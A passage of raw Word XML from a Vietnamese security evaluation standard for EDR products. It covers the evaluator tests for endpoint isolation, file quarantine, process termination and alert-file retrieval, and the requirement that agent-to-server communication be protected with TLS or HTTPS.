          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="164B57CC" w14:textId="77777777" w:rsidTr="00B75CA6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1379" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="223E316B" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>TSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8703" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46FA95A3" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:spacing w:val="-4"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Đánh giá viên phải kiểm  tra để đảm bảo rằng TSS mô tả vai trò nào có thể thực hiện những hành động khắc phục nào và cách thực hiện từng hành động khắc phục.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="4ECB37DF" w14:textId="77777777" w:rsidTr="00B75CA6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1379" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6373EED2" w14:textId="0D13565D" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00DE3774" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hướng dẫn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8703" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="719DD397" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Đánh giá viên phải xem xét hướng dẫn hoạt động để xác minh rằng EDR có khả năng để thực hiện các chức năng quản lý.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="1B948674" w14:textId="77777777" w:rsidTr="00B75CA6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1379" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="652B5521" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Đánh giá</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8703" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A6DBB23" w14:textId="615E8B1D" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve">Đối với mỗi vai trò, Đánh giá viên phải thực hiện các thử nghiệm dưới đây, xác minh rằng mỗi vai trò trong biểu đồ có thể thực hiện các chức năng được phép của chúng và bị hạn chế thực hiện các chức năng mà chúng không có quyền truy cập theo chú giải (Chú giải biểu đồ: M = Bắt buộc, O = Tùy chọn, - = </w:t>
            </w:r>
            <w:r w:rsidR="00EC6AC5" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Không xác định</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EB119FC" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Thử nghiệm 1:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> Điều kiện: Nếu "cách ly hợp lý điểm cuối khỏi mạng trừ khi được cho phép" được chọn, Đánh giá viên phải cách ly hợp lý hệ thống điểm cuối được quản lý khỏi mạng và xác minh rằng hệ thống không thể truy cập địa chỉ mạng hoặc tài nguyên bên ngoài danh sách cho phép.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B3EC472" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Thử nghiệm 2:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> Điều kiện: Nếu "cách ly tệp độc hại trên điểm cuối" được chọn, Đánh giá viên phải xác minh chức năng cách ly các tệp có khả năng trái  phép trên điểm cuối.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52031278" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Thử nghiệm 3:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> Đánh giá viên phải chạy một tệp thực thi trên hệ thống điểm cuối được quản lý, chấm dứt quy trình của nó khỏi giao diện quản trị EDR và sau đó xác minh rằng quy trình không còn chạy trên hệ thống.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AE86341" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Thử nghiệm 4:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> Đánh giá viên phải đặt một tệp được biết là kích hoạt cảnh báo sự cố trên hệ thống tệp sau đó truy xuất nội dung của tệp từ bảng điều  khiển quản lý EDR.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20349067" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2BF6CB1C" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">9.3.4 FPT: Bảo vệ TSF </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DAC923" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>9.3.4.1 FPT: FPT_ITT.1 Bảo vệ truyền dữ liệu TSF nội bộ cơ bản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256326FF" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FPT_ITT.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D058C3" w14:textId="03B72D60" w:rsidR="00B75CA6" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tinh chỉnh</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>EDR</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> phải [</w:t>
      </w:r>
      <w:r w:rsidR="00475C38" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>lựa chọn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581973C0" w14:textId="4319ADCE" w:rsidR="00B75CA6" w:rsidRPr="00204C5F" w:rsidRDefault="00B75CA6" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B0249">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">- thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="003D2FD0" w:rsidRPr="008B0249">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">[ </w:t>
      </w:r>
      <w:r w:rsidR="003D2FD0" w:rsidRPr="008B0249">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>lựa chọn</w:t>
      </w:r>
      <w:r w:rsidR="003D2FD0" w:rsidRPr="008B0249">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="003D2FD0" w:rsidRPr="008B0249">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="008B0249">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">TLS như được định nghĩa trong </w:t>
      </w:r>
      <w:r w:rsidRPr="008B0249">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="008B0249">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">ói TLS, HTTPS như được định nghĩa trong </w:t>
      </w:r>
      <w:r w:rsidR="00475C38" w:rsidRPr="008B0249">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Hồ sơ bảo vệ</w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="008B0249">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> cơ sở</w:t>
      </w:r>
      <w:r w:rsidR="00475C38" w:rsidRPr="008B0249">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="008B0249">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511DDF8B" w14:textId="33DC7DBD" w:rsidR="003D2FD0" w:rsidRPr="00204C5F" w:rsidRDefault="00B75CA6" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B0249">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="008B0249">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>gọi chức năng do nền tảng cung cấp cho [</w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="008B0249">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>lựa chọn</w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="008B0249">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>: TLS, HTTPS]</w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="008B0249">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D2FD0" w:rsidRPr="008B0249">
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DBD1F6" w14:textId="567E8CE0" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:t>để bảo vệ dữ liệu TSF khỏi</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> [sửa đổi, tiết lộ] </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">khi được truyền </w:t>
      </w:r>
      <w:r w:rsidR="003D2FD0" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">tải </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>giữa các phần riêng biệt của TOE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7712B596" w14:textId="2AF40D7E" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lưu ý áp dụng</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>: Mục đích của yêu cầu trên là sử dụng các giao thức mật mã được xác định trong yêu cầu thiết lập và duy trì một kênh đáng tin cậy giữa EDR và Tác nhân máy chủ, được coi là các phần riêng biệt của TOE. Gói TLS cho phép sử dụng TLS hoặc DTLS. Chỉ có thể sử dụng TLS, DTLS hoặc HTTPS trong kênh đáng tin cậy này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CD38ED" w14:textId="2D25ECCD" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Yêu cầu này là để đảm bảo rằng việc truyền bất kỳ nhật ký, danh sách quy trình, thông tin hệ thống, v.v. khi được lệnh hoặc trong khoảng thời gian cấu hình, được bảo vệ đúng cách. Kênh nội bộ này cũng bảo vệ mọi lệnh và chính sách do EDR gửi cho tác nhân máy chủ. Tác nhân máy chủ hoặc EDR đều có thể bắt đầu kết nối.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130D9246" w14:textId="3CB88B47" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00217303" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:t>Kênh nội bộ này bảo vệ kết nối giữa tác nhân máy chủ với EDR và các kết nối giữa tác nhân máy chủ không được kiểm soát với EDR trong quá trình đăng ký hoạt động</w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">. Các giao thức khác nhau có thể được sử dụng cho hai kết nối này và mô tả trong TSS sẽ làm </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>rõ</w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> sự khác biệt này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0DB25B" w14:textId="55485721" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">Kênh nội bộ sử dụng giao thức từ gói TLS hoặc HTTPS làm giao thức bảo vệ tính </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> và tính toàn vẹn của thông tin liên lạc</w:t>
      </w:r>
      <w:r w:rsidR="003D2FD0" w:rsidRPr="00204C5F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> Đánh giá viên</w:t>
      </w:r>
      <w:r w:rsidR="003D2FD0" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>chọn cơ chế hoặc cơ chế được hỗ trợ bởi EDR, và sau đó đảm bảo các yêu cầu chính xác được bao gồm trong ST nếu chưa tồn tại. Giao thức, RBG, xác thực chứng chỉ, thuật toán và các dịch vụ tương tự có thể được đáp ứng với các dịch vụ do nền tảng cung cấp.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703"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="0DA53CCE" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E8028C4" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Hoạt động</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8789" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15A8F3FF" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Hoạt động đảm bảo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="2F174FF0" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="171A6309" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>TSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8789" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A560C96" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Nếu "gọi chức năng do nền tảng cung cấp cho..." được chọn, Đánh giá viên phải xác minh TSS chứa các lệnh đến nền tảng mà TOE  đang tận dụng để gọi chức năng.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="022DB8CD" w14:textId="3803BA89" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Nếu "thực hiện..." được chọn, Đánh giá viên phải kiểm tra TSS để xác minh cách bảo vệ thông tin liên lạc của Agent- Server và phù hợp với SFR. Đánh giá viên </w:t>
            </w:r>
            <w:r w:rsidR="00217303" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>phải</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> xác nhận rằng tấ</w:t>
            </w:r>
            <w:r w:rsidR="00217303" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>t cả các giao thức được liệt kê</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> trong TSS phù hợp với các giao thức được chỉ định trong yêu cầu và được bao gồm trong các yêu cầu trong  ST.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="67250015" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C627E43" w14:textId="3B6613CA" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00DE3774" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Hướng dẫn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8789" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5992932D" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Đánh giá viên phải xác nhận rằng hướng dẫn hoạt động chứa hướng dẫn cấu hình kênh liên lạc giữa Tác nhân máy chủ và EDR cho từng phương pháp được hỗ trợ.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
